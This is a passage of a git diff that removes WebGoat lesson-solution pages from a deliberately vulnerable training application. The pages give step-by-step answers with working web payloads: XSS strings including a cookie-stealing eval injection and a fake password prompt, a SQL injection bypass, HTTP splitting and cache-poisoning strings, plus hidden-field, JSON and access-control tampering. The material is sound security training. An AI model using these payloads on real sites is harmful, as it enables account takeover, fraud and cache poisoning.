-Stage 2: Enter "<img src=x onerror=;;alert('XSS') />" and submit the solution.

-
-Stage 2 result


-Stage 3: Enter "<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" and submit the solution.

-
-Stage 3 result


-Stage 4: Enter "Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>" and submit the solution.

-
-Stage 4 result


-Stage 5: You have to use the JavaScript escape.js for the input.
-You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).
-Open the JavaScript DOMXSS.js


-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " +
name + "!";
- }
-}

-
-You have to change this to:

-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " +
escapeHTML(name); + "!";
- }
-}

-
-The attacks will no longer work. -


- - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/DOS_Login.html b/src/main/webapp/lesson_solutions_1/DOS_Login.html deleted file mode 100644 index 575a3916f..000000000 --- a/src/main/webapp/lesson_solutions_1/DOS_Login.html +++ /dev/null @@ -1,704 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: Denial of -Service from Multiple Logins

- -

 

- -

Concept / -Topic To Teach:

- -

Denial of -service attacks are a major issue in web applications. If the end user cannot conduct -business or perform the service offered by the web application, then both time -and money is wasted.

- -

 

- -

General -Goal(s):

- -

This site -allows a user to login multiple times. This site has a database connection pool -that allows 2 connections. You must obtain a list of valid users and create a -total of 3 logins.

- -

Solution:

- -

 

- -

This site -allows a user to login multiple times. There is a database connection pool that -allows 2 connections. You must obtain a list of valid users and create a total -of 3 logins.

- -

 

- -

Let's try a -SQL Injection attack. Enter in the password field ' or '1' = '1

- -

 

- -

- -

Figure 1 Lesson 20

- -

 

- -

Login with -user name jsnow and password passwd1. Then login with user name jdoe and -password passwd1. And finally login with jplane and passwd3.

- -

 

- -

- -

Figure 2 Lesson 20 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - - diff --git a/src/main/webapp/lesson_solutions_1/DangerousEval.html b/src/main/webapp/lesson_solutions_1/DangerousEval.html deleted file mode 100644 index a2f353c50..000000000 --- a/src/main/webapp/lesson_solutions_1/DangerousEval.html +++ /dev/null @@ -1,28 +0,0 @@ - - - - -Dangerous Use of Eval - - - -

Lesson Plan Title: Dangerous Use of Eval)

- -

Concept / Topic To Teach:
-It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated user-supplied data is used in conjunction with a Javascript eval() call. In a reflected XSS attack, an attacker can craft a URL with the attack script and store it on another website, email it, or otherwise trick a victim into clicking on it. -

- -

General Goal(s):
-For this exercise, your mission is to come up with some input which, when run through eval, will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie. -

- -Solution:
-The value of the digit access code field is placed in the Javascript eval() function. This is the reason why your attack will not require the "<script>" tags.
-Enter: 123');alert(document.cookie);('

-The result on the server is:

- eval('123');
-alert(document.cookie);
-('
'); -


- - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/Encoding.html b/src/main/webapp/lesson_solutions_1/Encoding.html deleted file mode 100644 index 08375aab2..000000000 --- a/src/main/webapp/lesson_solutions_1/Encoding.html +++ /dev/null @@ -1,22 +0,0 @@ - - - - -Encoding Basics - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-Different encoding schemes can be used in web applications for different reasons. -

- -

General Goal(s):
-This lesson will familiarize the user with different encoding schemes. -

- -Solution:
-Enter the string "abc". In the List below you see the encoded value of the string. For rot13 encoding this is "nop". Now enter a string "a c" and have a look on the url encoding.


- - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html b/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html deleted file mode 100644 index a6d9b7a47..000000000 --- a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html +++ /dev/null @@ -1,741 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Bypass a Fail Open -Authentication Scheme

- -

 

- -

Concept / Topic To Teach: Abusing error handling.

- -

 

- -

This lesson presents -the basics for understanding the "fail open" condition regarding -authentication. The security term, "fail open" describes a behavior of a -verification mechanism. This is when an error (i.e. unexpected exception) -occurs during a verification method causing that method to evaluate to true. -This is especially dangerous during login.

- -

 

- -

General Goal(s):

- -

The user -should be able to bypass the authentication check.

- -

 

- -

- -

Figure 1 Lesson 19

- -

 

- -

Solution:

- -

 

- -

Enter user -name webgoat and click "Login". Intercept the request with WebScarab.

- -

 

- -

- -

Figure 2 Intercepted request

- -

 

- -

Click on the -variable "Password" and click "Delete". Click "Accept changes".

- -

 

- -

- -

Figure 3 Password variable is deleted

- -

 

- -

You are now -"authenticated" as WebGoat.

- -

 

- -

- -

Figure 4 Lesson 19 Completed

- -

 

- -

The problem -is that the exception handler in the Java code is executing a catch block for successful -authentication. The exception occurs because there is a NullPointer exception -when reading out the password parameter.

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html b/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html deleted file mode 100644 index be8032dac..000000000 --- a/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html +++ /dev/null @@ -1,767 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Forced Browsing Attacks.

- -

 

- -

Concept -/ Topic To Teach:

- -

How -to Exploit Forced Browsing.

- -

 

- -

How -the attacks works:

- -

Forced -browsing is a technique used by attackers to gain access to resources that are -not referenced, but are nevertheless accessible. One technique is to manipulate -the URL in the browser by deleting sections from the end until an unprotected -directory is found

- -

 

- -

General -Goal(s):

- -

Your -goal should be to try to guess the URL for the "config" interface.
-The "config" URL is only available to the maintenance personnel.
-The application doesn't check for horizontal privileges.

- -

 

- -

- -

Figure 1 Insecure configuration -management – Forced Browsing

- -

 

- -

Solution:

- -

If you want to access a restricted page, you need to -be able to guess the URI to access the page, for example /admin.

- -

In this environment, WebGoat consists of different -servlets that live in the WebGoat application. The main servlet is /attack, -what could be the servlet for config?

- -

 

- -

Try to access config, -configuration, conf, ….

- -

 

- -

- -

Figure 2 No config

- -

 

- -

- -

Figure 3 No configuration

- -

 

- -

- -

Figure 4 Bingo for conf

- -

 

- -

This -could be automated with a tool like Wikto 2.0

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/ForgotPassword.html b/src/main/webapp/lesson_solutions_1/ForgotPassword.html deleted file mode 100644 index f32e4dd12..000000000 --- a/src/main/webapp/lesson_solutions_1/ForgotPassword.html +++ /dev/null @@ -1,828 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Exploit the Forgot Password Page

- -

 

- -

Concept / -Topic To Teach:

- - - -

Web -applications frequently provide their users the ability to retrieve a forgotten -password. Unfortunately, many web applications fail to implement the mechanism -properly. The information required to verify the identity of the user is often -overly simplistic.

- -

 

- -

General -Goal(s):

- -

Users can -retrieve their password if they can answer the secret question properly. There -is no lock-out mechanism on this 'Forgot Password' page. Your username is -'webgoat' and your favorite color is 'red'. The goal is to retrieve the -password of another user.

- -

 

- -

Solution:

- -

 

- -

This lesson -will show you how easy it is to guess a secret question and retrieve somebody -else his password.

- -

 

- -

- -

Figure 1 Lesson 10

- -

 

- -

When you -enter the user name webgoat and then the answer "red" for your favorite color, -you will get a password reminder, only not via e-mail.

- -

 

- -

- -

Figure 2 Submit the answer red

- -

 

- -

- -

Figure 3 Password reminder for user webgoat

- -

 

- -

The password -for user webgoat is webgoat. This is a weak password policy, which is also a -bad thing J

- -

 

- -

Now you need -to guess the password for another user. The text tells you something about an -"OWASP admin". So let’s try "admin" for a user name.

- -

 

- -

- -

Figure 4 Is there a user admin?

- -

 

- -

This works. -Now you need the guess some colors.

- -

 

- -

- -

Figure 5 There is a user admin!

- -

 

- -

 

- -

Try blue, red -and green for example.

- -

 

- -

- -

Figure 6 No blue

- -

 

- -

Blue is an -incorrect response.

- -

 

- -

- -

Figure 7 It's green!

- -

 

- -

Green is the -correct answer and now you know the difficult password for user admin.

- -

 

- -
-
- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html b/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html deleted file mode 100644 index c5c3cf825..000000000 --- a/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html +++ /dev/null @@ -1,685 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Exploit Hidden Fields

- -

 

- -

Concept / -Topic To Teach:

- -

Developers -will use hidden fields for tracking, login, pricing, etc.. information on a -loaded page. While this is a convenient and easy mechanism for the developer, -they often don't validate the information that is received from the hidden -field. This lesson will teach the attacker to find and modify hidden fields to -obtain a product for a price other than the price specified

- -

 

- -

General -Goal(s):

- -

The user -should be able to exploit a hidden field to obtain a product at an incorrect -price.

- -

 

- -

- -

Figure 1 Lesson 4

- -

 

- -

Solution:

- -

 

- -

To change the -hidden field you need to start your favorite HTTP Interceptor. You can use -WebScarab from OWASP to intercept the request and change the hidden field. -Configure your browser to use a local proxy. In Internet Explorer you can do -this via "Tools" – "Internet Options" – "Connections" – "LAN Settings". You -must define proxy "localhost" with port 8008.

- -

 

- -

- -

Figure 2 Set local proxy in Internet Explorer

- -

 

- -

Start -WebScarab

- -

 

- -

- -

Figure 3 Intercept request with WebScarab

- -

 

- -

- -

Figure 4 Change the Price variable to 1

- -

 

- -

- -

Figure 5 Lesson 4 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/HtmlClues.html b/src/main/webapp/lesson_solutions_1/HtmlClues.html deleted file mode 100644 index dd907cfb0..000000000 --- a/src/main/webapp/lesson_solutions_1/HtmlClues.html +++ /dev/null @@ -1,677 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Discover Clues in the HTML

- -

 

- -

Concept / -Topic To Teach:

- -

Developers -are notorious for leaving statements like FIXME's, Code Broken, Hack, etc... -inside the source code.  Review the source code for any comments -denoting passowrds, backdoors, or something doesn't work right. 

- -

 

- -

General -Goal(s):

- -

The user -should be able to bypass the authentication check.

- -

 

- -

- -

Figure 1 Lesson 3

- -

 

- -

Right-click -the page and select "View source"

- -

- -

Figure 2 View Source

- -

 

- -

Solution:

- -

 

- -

 

- -

Examine the -HTML source.

- -

 

- -

- -

 

- -

In the HTML -source there is a comment that contains a user name admin and a password -adminpw. Enter these values in WebGoat and click "Login"

- -

 

- -

- -

Figure 3 Enter discovered credentials

- -

 

- -

- -

Figure 4 Lesson 3 Completed

- -

 

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/HttpBasics.html b/src/main/webapp/lesson_solutions_1/HttpBasics.html deleted file mode 100644 index 73bfee09b..000000000 --- a/src/main/webapp/lesson_solutions_1/HttpBasics.html +++ /dev/null @@ -1,602 +0,0 @@ - - - - - - - -Solution: Http Basics - - - - - - - - - - - - -
- -

Lesson -Plan Title: Http -Basics

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -presents the basics for understanding the transfer of data between the browser -and the web application.
-
-Client Request: How HTTP works:

- -

All HTTP transactions -follow the same general format. Each client request and server response has -three parts: the request or response line, a header section, and the entity -body. The client initiates a transaction as follows:
-
-The client contacts the server and sends a document request

- -


-        GET /index.html?param=value HTTP/1.0
-
-Next, the client sends optional header information to inform the server of its -configuration and the document formats it will accept.
-
-        User-Agent: Mozilla/4.06 Accept: image/gif, -image/jpeg, */*
-
-After sending the request and headers, the client may send additional data. -This data is mostly used by CGI programs using the POST method.

- -

 

- -

General -Goal(s):

- -

Enter your -name in the input field below and press "go" to submit. The server -will accept the request, reverse the input, and display it back to the user, -illustrating the basics of handling an HTTP request.
-
-The user should become familiar with the features of WebGoat by manipulating -the above buttons to view hints and solution. We have to use WebScarab for the first time

- -

 

- -

Solution:

- -

Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".

- - - -

Figure 1 Intercept Request

- -

 

- -

Fill out your -name and click the button Go! We get a new WebScarab window, where we can find the parameter person.

- -

 

- - - -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - diff --git a/src/main/webapp/lesson_solutions_1/HttpOnly.html b/src/main/webapp/lesson_solutions_1/HttpOnly.html deleted file mode 100644 index 173622596..000000000 --- a/src/main/webapp/lesson_solutions_1/HttpOnly.html +++ /dev/null @@ -1,863 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: HttpOnly Test

- -

 

- -

Concept / Topic To -Teach:

- - - -

To -help mitigate the cross site scripting threat, Microsoft has introduced a new cookie -attribute entitled 'HttpOnly.' If this flag is set, then the browser should not -allow client-side script to access the cookie. Since the attribute is -relatively new, several browsers neglect to handle the new attribute properly.

- -

 

- -

General Goal(s):

- -

The -purpose of this lesson is to test whether your browser supports the HTTPOnly -cookie flag. Note the value of the unique2u cookie. If your browser supports -HTTPOnly, and you enable it for a cookie, client side code should NOT be able -to read OR write to that cookie, but the browser can still send its value to -the server. Some browsers only prevent client side read access, but don't -prevent write access.

- -

 

- -

- -

Figure 1 Lesson HTTPOnly Test

- -

 

- -

Solution:

- -

 

- -

HTTPOnly -is not configured. When you click on "Read Cookie" you will get the following -pop-up in JavaScript, displaying the cookies

- -

 

- -

- -

Figure 2 All cookies

- -

 

- -

Select -"Yes" to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in -WebScarab.

- -

 

- -

- -

Figure 3 HTTP Request

- -

 

- -

- -

Figure 4 HTTP Response with HTTPOnly -cookie

- -

 

- -

 

- -

Click -on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.

- -

- -

Figure 5 Only JSESSIONID

- -

 

- -

- -

Figure 6 HTTPOnly Success

- -

 

- -

Click -on “Write cookie” which again only shows the JSESSIONID cookie.

- -

 

- -

- -

Figure 7 JSESSIONID cookie

- -

 

- -

- -

Figure 8 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/HttpSplitting.html b/src/main/webapp/lesson_solutions_1/HttpSplitting.html deleted file mode 100644 index 68e0b687d..000000000 --- a/src/main/webapp/lesson_solutions_1/HttpSplitting.html +++ /dev/null @@ -1,1019 +0,0 @@ - - - - - - - -Solution: Http Splitting and Cache Poisoning - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Http Splitting

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches how to perform HTTP Splitting attacks.

- -

 

- -

How the -attacks works:

- -

The attacker -passes malicious code to the web server together with normal input. A victim -application will not be checking for CR (carriage return, also given by %0d or -\r) and LF (line feed, also given by %0a or \n)characters. These characters not -only give attackers control of the remaining headers and body of the response -the application intends to send, but also allows them to create additional -responses entirely under their control.
-The effect of an HTTP Splitting attack is maximized when accompanied with a -Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of -the victim by fooling the cache to believe that the page hijacked using the -HTTP splitting is a good one and it is indeed the server's copy.
-The attack happens using the HTTP Splitting attack plus adding the Last-Modified: -header and setting it to a future date. This will force the browser to send If-Modified-Since -request header, which gives the attacker the chance to intercept the server's -reply and replace it with a '304 Not Modified' reply. A sample of a 304 response -is:
-HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT

- -

 

- -

General -Goal(s):

- - - -

-This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while -stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
-Enter a language for the system to search by. You will notice that the -application is redirecting your request to another resource on the server. You -should be able to use the CR (%0d) and LF (%0a) to exploit the attack. Your -exercise should be to force the server to send a 200 OK. If the screen changed -as an effect to your attack, just go back to the homepage and after stage 2 is -exploited successfully you will find the green check in the left menu.

- -

 

- -

- -

 

- -

Solution:

- -

-Please note that this solution is written for Windows. If you use Linux you have to alter it. -Windows uses a CR and LF for new Line. Linux uses only LF. -So all the %0d%0a have to be replaced by %0a if you are using Linux.

-

- -

Because the -input is not validated you can inject any HTTP syntax, carriage returns and -line-feed you want.

- -

 

- -

Enter a -language to examine what's going on. You do have WebScarab intercepting HTTP -requests and responses?

- -

 

- -

- -

Figure 1 Language en

- -

- -

Figure 2 HTTP Request

- -

 

- -

- -

Figure 3 First HTTP Response

- -

 

- -

- -

Figure 4 Second HTTP Request

- -

 

- -

Now inject -for the language en%0d%0a%0d%0a%0d%0a

- -

 

- -

- -

Figure 5 First HTTP Request

- -

 

- -

- -

Figure 6 First HTTP Response

- -

 

- -

The -Content-Length: 0 will tell the server that the first request is over.

- -

A 200 OK -message looks like this: HTTP/1.1 200 OK

- -

 

- -

Lets see what -you can do with: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked -J</html>

- -

 

- -

- -

Figure 7 HTTP Splitting attack

- -

 

- -

- -

Figure 8 HTTP Response

- -

 

- -

- -

Figure 9 Second HTTP Request

- -

 

- -

- -

Figure 10 Second HTTP Response

- -

 

- -

- -

Figure 11 Hacked!

- -

 

- -

Hit the "Back" -button of your browser.

- -

 

- -

- -

Figure 12 Stage 1 completed

- -

 

- -

Now you know -how to do HTTP Splitting. You can abuse this technique to do a cache poisoning -attack.

- -

 

- -

Cache -poisoning requires manipulating the Last-Modified header. This must be changed -to a date in the future.

- -

Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked -J</html>

- -

 

- -

- -

Figure 13 Inject cache poisoning

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/InsecureLogin.html b/src/main/webapp/lesson_solutions_1/InsecureLogin.html deleted file mode 100644 index c9abe281d..000000000 --- a/src/main/webapp/lesson_solutions_1/InsecureLogin.html +++ /dev/null @@ -1,61 +0,0 @@ - - - - -Insecure Login - - - -

Lesson Plan Title:Insecure Login

- -

Concept / Topic To Teach:
-Sensitive data should never sent in plaintext! -Often applications switch to a secure connection after the authorization. -An attacker could just sniff the login and use the gathered information -to break into an account. A good webapplication always takes care of -encrypting sensitive data. -

- -

General Goal(s):
-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data! -

- -Solution:
-

This lesson has two stages. In the first stage you try to sniff a password -which is sent in plaintext. In the second stage you try the same -but on a secure connection.

-

You need a client server setup for this lesson. Please refer -to the Tomcat Setup in the Introduction section.

- -Stage 1 -

Start a sniffer. If you do not have one we recommend wireshark, which -is free: Wireshark. Make sure -you are capturing on the right interface. Click on -the submit button ans stop the capturing. Now analyze the captured data.

-
-
- Figure 1: Sniffed Traffic -
-

As you can see we are interested in the HTTP Post request as -the password is transmitted there. The field for the password has -the name clear_pass and has as value sniffy. Of course -this is also the correct answer and you are done with stage 1.

- -Stage 2 -

-Now you have to switch to a secure connection. You archive this -by changing the URL from http://... to https://... Sniff again the traffic -as you have done in stage 1. As you will see there is not sent the password -in plaintext. The server communicates with the application over a secure layer -the so called Transport Layer Security (TLS) also called Secure Socket Layer (SSL). -TLS is a hybrid encrypting protocol. A master secret is built to communicate. -This master secret is built by using SHA-1 and MD5. All traffic between -the Server and the Cleint is encrypted.

- - - - - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/JSONInjection.html b/src/main/webapp/lesson_solutions_1/JSONInjection.html
deleted file mode 100644
index a78a84d25..000000000
--- a/src/main/webapp/lesson_solutions_1/JSONInjection.html
+++ /dev/null
@@ -1,806 +0,0 @@
- - - - - - - -Solution: JSON Injection - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform JSON Injection

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches how to perform JSON Injection Attacks.

- -

 

- -

How the -attacks works:

- -

JavaScript Object -Notation (JSON) is a simple and effective lightweight data exchange format. -JSON can be in a lot of forms such as arrays, lists, hashtables and other data -structures. JSON is widely used in AJAX and Web2.0 application and is favored -by programmers over XML because of its ease of use and speed. However, JSON, -like XML is prone to Injection attacks. A malicious attacker can inject the -reply from the server and inject some arbitrary values in there.

- -

 

- -

General -Goal(s):

- -

You -are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code -SEA.
-Once you enter the three digit code of the airport, an AJAX request will be -executed asking for the ticket price.
-You will notice that there are two flights available, an expensive one with no -stops and another cheaper one with 2 stops.
-Your goal is to try to get the one with no stops but for a cheaper price.

- -

 

- -

- -

Figure 1 AJAX Security - JSON Injection

- -

 

- -

Solution:

- -

Like with the previous lessons you need to manipulate the HTTP Response -using WebScarab.

- -

 

- -

Examine the normal flow by entering the airport code BOS and SEA and -intercept the HTTP Request and the HTTP Response in WebScarab.

- -

 

- -

- -

Figure 2 Intercept HTTP Request

- -

 

- -

- -

Figure 3 Intercept HTTP Response

- -

 

- -

Change the -price for the expensive flight of $600 to $100 and click "Accept changes".

- -

 

- -

 

- -

- -

Figure 4 Updated price

- -

 

- -

- -

Figure 5 Injected result

- -

 

- -

Select the flight -with no stops and the updated price and click "Submit".

- -

 

- -

- -

Figure 6 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html b/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html
deleted file mode 100644
index b46f2e402..000000000
--- a/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html
+++ /dev/null
@@ -1,841 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Bypass Client Side JavaScript Validation

- -

 

- -

Concept / -Topic To Teach:

- -

Client-side validation -should not be considered a secure means of validating parameters. This -validation only helps reducing the amount of server processing time for normal -users who do not know the format of required input. Attackers can bypass these -mechanisms easily in various ways. Any client-side validation should be -duplicated on the server side. This will greatly reduce the likelihood of -insecure parameter values being used in the application.

- -

 

- -

General -Goal(s):

- -

For this -exercise, the web site requires that you follow certain rules when you fill out -a form. The user should be able to break those rules, and send the website -input that it wasn't expecting.

- -

- -

 

- -

Figure 1 Lesson 6

- -

 

- -

There are two -ways to complete this lesson. The first one is to submit a valid request like -the one from the screenshot above and intercept this using WebScarab. The -second way is to intercept the HTTP Response when loading the page and remove -the Javascript that validates the values.

- -

 

- -

Solution 1

- -

 

- -

- -

Figure 2 Intercept request

- -

 

- -

Add different -symbols to the fields and click "Accept changes".

- -

 

- -

- -

Figure 3 Change parameters

- -

 

- -

- -

Figure 4 Lesson 6 Completed

- -

 

- -

Solution 2

- -

 

- -

Reload the -page by clicking on the menu item "How to bypass Client-Side Javascript -Validation" and intercept the response in WebScarab.

- -

 

- -

- -

Figure 5 Enable "Intercept responses"

- -

 

- -

- -

Figure 6 Intercepted response

- -

 

- -

If you remove -the onclick="validate();" the "Submit" button will not work anymore.

- -

Locate the -validate() Javascript function in the HTML page.

- -

 

- -

- -

Figure 7 The function validate()

- -

 

- -

Removing the regular -expressions will remove the Javascript validation and submit the form.

- -

 

- -

- -

Figure 8 Changed validate() function

- -

 

- -

Click "Accept -changes". This returns a HTML page like before but without any regular -expression checks.

- -

 

- -

- -

Figure 9 It looks the same

- -

 

- -

Change the -fields in the HTML page to contain symbols like @#@@# and click "Submit".

- -

 

- -

- -

Figure 10 No more regular expression checks

- -

 

- -

- -

Figure 11 Lesson 6 Completed

- -

 

- -
-
- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
deleted file mode 100644
index 18aa18be9..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
+++ /dev/null
@@ -1,50 +0,0 @@
- - - - -Solution Lab Role Based Access Control Stage2 - - - -

Lesson Plan Title: Role Based Access Control: Stage 2

- -

Concept / Topic To Teach:
-In role-based access control scheme, a role represents -a set of access permissions and privileges. A user can be -assigned one or more roles. A role-based access control -normally consists of two parts: role permission management -and role assignment. A broken role-based access -control scheme might allow a user to perform accesses -that are not allowed by his/her assigned roles, or -somehow obtain unauthorized roles. -

- -

General Goal(s):
-Your goal is to explore the access control -rules that govern this site. Each role has permission to -certain resources (A-F). Each user is assigned one or more roles. -Only the user with the [Admin] role should have access -to the 'F' resources. In a successful attack, a user doesn't -have the [Admin] role can access resource F. -

- -

-Solution:
-You have to be sure that the user is AUTHORIZED to do an action! So you have to check for his authorization. -You have to write some code in the class -org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java. -Alter the handleRequest method as there is happening the dispatching. -There is already a method called isAuthorized which you can use: -

-

-//***************CODE HERE*************************
-if(!isAuthorized(s, getUserId(s), requestedActionName))
-{
-  throw new UnauthorizedException();
-}									
-//*************************************************
-
-Try the attack again and you will see that the authorization fails and the -lesson is completed. - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
deleted file mode 100644
index f6ab88361..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
+++ /dev/null
@@ -1,56 +0,0 @@
- - - - -Solution Lab Role Based Access Control Stage4 - - - -

Lesson Plan Title: Role Based Access Control: Stage 4

- -

Concept / Topic To Teach:
-In role-based access control scheme, a role represents -a set of access permissions and privileges. A user can be -assigned one or more roles. A role-based access control -normally consists of two parts: role permission management -and role assignment. A broken role-based access -control scheme might allow a user to perform accesses -that are not allowed by his/her assigned roles, or -somehow obtain unauthorized roles. -

- -

General Goal(s):
-Your goal is to explore the access control -rules that govern this site. Each role has permission to -certain resources (A-F). Each user is assigned one or more roles. -Only the user with the [Admin] role should have access -to the 'F' resources. In a successful attack, a user doesn't -have the [Admin] role can access resource F. -

- -

-Solution:
-You have to be sure that the user is AUTHORIZED to do an action and that -he is authorized to do this action on a certain employee! So you have to check for his authorization. -You have to write some code in the class -org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java. -Alter the handleRequest method as there is happening the dispatching. -Action has already a method called isAuthorizedForEmployee which you can use: -

-

-//***************CODE HERE*************************
-if(!isAuthorized(s, getUserId(s), requestedActionName))
-{
-  throw new UnauthorizedException();
-}
-if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
-{
-  throw new UnauthorizedException();
-}						
-//*************************************************
-
-Try the attack again and you will see that the authorization fails and the -lesson is completed. - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
deleted file mode 100644
index 004e26185..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
+++ /dev/null
@@ -1,48 +0,0 @@
- - - - -Solution Lab Role Based Access Control Stage1 - - - -

Lesson Plan Title: Role Based Access Control: Stage 1

- -

Concept / Topic To Teach:
-In role-based access control scheme, a role represents -a set of access permissions and privileges. A user can be -assigned one or more roles. A role-based access control -normally consists of two parts: role permission management -and role assignment. A broken role-based access -control scheme might allow a user to perform accesses -that are not allowed by his/her assigned roles, or -somehow obtain unauthorized roles. -

- -

General Goal(s):
-Your goal is to explore the access control -rules that govern this site. Each role has permission to -certain resources (A-F). Each user is assigned one or more roles. -Only the user with the [Admin] role should have access -to the 'F' resources. In a successful attack, a user doesn't -have the [Admin] role can access resource F. -

- -

-Solution:
-To solve this exercise you have to know the name of the action, which -deletes employees. Of course you could just guess -it because it has a really logical name. -But we will look it up. So your first step is to log in as John with john as -password. Use WebScarab to intercept the delete request. - -deleteAction - -As you can see the delete action is called DeleteProfile. -Now log in as Tom. Click in the list on his name and make sure WebScarab -will intercept the next request. Click on a button, for example the -'ViewProfile' button. Change in WebScarab the action to DeleteProfile -and you are done! - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html deleted file mode 100644 index e94e42c45..000000000 --- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html +++ /dev/null @@ -1,46 +0,0 @@ - - - - -Solution Lab Role Based Access Control Stage3 - - - -

Lesson Plan Title: Role Based Access Control: Stage 3

- -

Concept / Topic To Teach:
